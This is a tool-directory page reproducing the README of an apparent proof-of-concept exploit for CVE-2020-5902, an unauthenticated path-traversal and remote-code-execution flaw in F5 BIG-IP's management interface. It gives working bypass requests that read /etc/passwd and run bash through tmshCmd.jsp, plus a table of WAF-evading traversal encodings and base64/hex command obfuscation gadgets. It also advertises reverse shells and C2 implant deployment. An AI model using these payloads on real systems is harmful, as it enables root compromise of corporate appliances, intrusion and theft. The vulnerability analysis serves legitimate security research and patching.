Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
F5-BIG-IP — O F5 BIG-IP é uma plataforma de entrega e segurança de aplicações amplamente utilizada em ambientes corporativos. A CVE-2020-5902 é uma vulnerabilidade crítica no TMUI que, em versões não corrigidas, pode permitir acesso não autorizado e execução remota de código, reforçando a necessidade de atualização e gestão contínua de vulnerabilidades. | Kitploit
Tools/GitHubGitHub/devrafaelprogrammer/f5-big-ip
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRed TeamingPayload Development
GitHub
devrafaelprogrammer/f5-big-ip

F5-BIG-IP

View Repository
93 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →

About

O F5 BIG-IP é uma plataforma de entrega e segurança de aplicações amplamente utilizada em ambientes corporativos. A CVE-2020-5902 é uma vulnerabilidade crítica no TMUI que, em versões não corrigidas, pode permitir acesso não autorizado e execução remota de código, reforçando a necessidade de atualização e gestão contínua de vulnerabilidades.

Share

CVE-2020-5902 — F5 BIG-IP TMUI RCE

Proof-of-Concept exploit for the critical path-traversal / remote code execution vulnerability in F5 BIG-IP's Traffic Management User Interface (TMUI).

⚠️ For authorized penetration testing and security research only. Unauthorized use against systems you do not own or have written permission to test is illegal. The author assumes no liability for misuse of this tool.


Table of Contents

  • Background
  • Vulnerability Analysis
  • Technical Deep-Dive
  • Affected Versions
  • Features
  • Installation
  • Usage
  • Defensive Measures
  • Detection & Threat Hunting
  • Timeline
  • References
  • Disclaimer

Background

F5 BIG-IP is a family of multi-purpose network appliances (load balancers, WAFs, application delivery controllers) deployed in the majority of Fortune 500 companies, financial institutions, healthcare organizations, and government agencies worldwide. The Traffic Management User Interface (TMUI) — also referred to as the Configuration Utility — is the web-based management portal accessible on port 443 (or 8443).

In July 2020, F5 disclosed CVE-2020-5902, a Critical (CVSS 9.8) unauthenticated path-traversal vulnerability in TMUI that allows a remote, unauthenticated attacker to:

  • Read arbitrary files from the underlying Linux system (LFI)
  • Execute arbitrary OS commands as root (RCE)
  • Completely compromise the appliance and pivot to internal networks

Within days of public disclosure, mass exploitation was observed in the wild, including by nation-state actors.


Vulnerability Analysis

Root Cause

The TMUI is built on Apache Tomcat and uses a servlet filter to enforce authentication on protected resources. The vulnerability lies in how Tomcat parses semicolon-delimited path segments (;).

The following request bypasses authentication entirely:

GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Why it works:

  1. The Tomcat servlet filter sees the path as /tmui/login.jsp (ends before ;) — which is the public login page — and allows the request.
  2. Tomcat's URL resolver then processes /..;/ as a path traversal (/../) before dispatching.
  3. The request is ultimately routed to the protected fileRead.jsp servlet without authentication.
┌──────────────────────────────────────────────────────────────────┐
│  Client Request                                                   │
│  GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp     │
└────────────────────────────┬─────────────────────────────────────┘
                             │
             ┌───────────────▼───────────────┐
             │    Tomcat Servlet Filter       │
             │  Sees: /tmui/login.jsp  ✓     │
             │  (public endpoint → ALLOW)    │
             └───────────────┬───────────────┘
                             │
             ┌───────────────▼───────────────┐
             │    Tomcat URL Resolver         │
             │  Resolves: /..;/ → /../       │
             │  Final path: /tmui/locallb/   │
             │  workspace/fileRead.jsp ← 🔓  │
             └───────────────┬───────────────┘
                             │
             ┌───────────────▼───────────────┐
             │  fileRead.jsp (no auth check) │
             │  Reads arbitrary files as root│
             └───────────────────────────────┘

From LFI to RCE

The tmshCmd.jsp servlet (also reachable via the same traversal) passes the command and utilCmdArgs parameters directly to tmsh (the BIG-IP management shell), which wraps run util bash -c '...'. This provides unauthenticated root-level OS command execution:

POST /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp
command=run+util+bash+-c+'id'&utilCmdArgs=-c+'id'

Technical Deep-Dive

Attack Flow

Phase 1: Reconnaissance
  └─ TCP banner grab (HTTP/TLS fingerprint)
  └─ SSL certificate analysis
  └─ HTTP headers fingerprint (Server, X-Powered-By, Set-Cookie)
  └─ BIG-IP version estimation from /etc/f5-release

Phase 2: Vulnerability Check
  └─ Iterate over 6 traversal encoding variants
  └─ Test against 4 known-readable sentinel files
  └─ Confirm output matches known indicators (root:x:0:0, BIG-IP, etc.)

Phase 3: Exploitation
  ├─ Vector A: tmshCmd.jsp (primary RCE)
  │    └─ Command obfuscated via base64 / hex-encode gadgets
  ├─ Vector B: fileRead.jsp + command injection in fileName param
  │    └─ OS command injected into the fileName parameter
  └─ Vector C: Log poisoning (User-Agent injection → read access_log)

Phase 4: Post-Exploitation (optional)
  ├─ Interactive shell (command REPL)
  ├─ Reverse shell (4 concurrent one-liners)
  ├─ LFI brute-force (30 sensitive paths, parallel)
  └─ C2 implant deployment (Sliver / Metasploit / custom)

Traversal Encoding Variants

VariantPayload
Standardtmui/login.jsp/..;/tmui/...
Encoded semicolontmui/login.jsp/..%3b/tmui/...
Double URL encodetmui%2flogin.jsp%2f..%3b%2ftmui%2f...
Unicode dot-dottmui/login.jsp/%2e%2e;/tmui/...
Case variationTMUI/login.jsp/..;/tmui/...
Directory confusiontmui/login.jsp/..;/tmui/locallb/workspace/../workspace/...

Command Obfuscation Gadgets

The tool applies one of two obfuscation gadgets per execution, making static signature detection harder:

# Gadget 1 — Base64 encode/decode pipeline
bash -c {echo,aWQ=}|{base64,-d}|bash

# Gadget 2 — Hex-byte printf evaluation
eval "$(printf '\x69\x64')"

Affected Versions

BIG-IP BranchVulnerable RangePatched Version
15.x< 15.1.0.4≥ 15.1.0.4
14.x< 14.1.2.6≥ 14.1.2.6
13.x< 13.1.3.4≥ 13.1.3.4
12.x< 12.1.5.2≥ 12.1.5.2
11.x< 11.6.5.2≥ 11.6.5.2

BIG-IQ, BIG-IQ Centralized Management, F5OS, and Traffix SDC are not affected by this specific CVE.


Features

  • Multi-variant path traversal — 6 encoding permutations to evade WAF/IDS signatures
  • Three independent RCE vectors — tmshCmd.jsp, fileRead injection, log poisoning
  • Command obfuscation gadgets — base64 and hex-encode pipelines
  • Passive recon phase — TCP banner, SSL/TLS fingerprint, HTTP header analysis
  • Parallel LFI brute-force — 30 sensitive paths, 10 concurrent threads
  • Concurrent reverse shells — 4 one-liners fired simultaneously
  • C2 integration — Sliver, Metasploit, custom implants (Linux/Windows/PS1)
  • Evasion headers — random User-Agents, IP spoofing headers, noise headers
  • Interactive shell REPL — !revshell, !c2, !read, !brute commands
  • Proxy support — Burp Suite / mitmproxy integration

Installation

git clone https://github.com/DevRafaelprogrammer/F5-BIG-IP.git
cd F5-BIG-IP
pip install requests pycryptodome urllib3

Requirements: Python 3.10+


Usage

Download Tool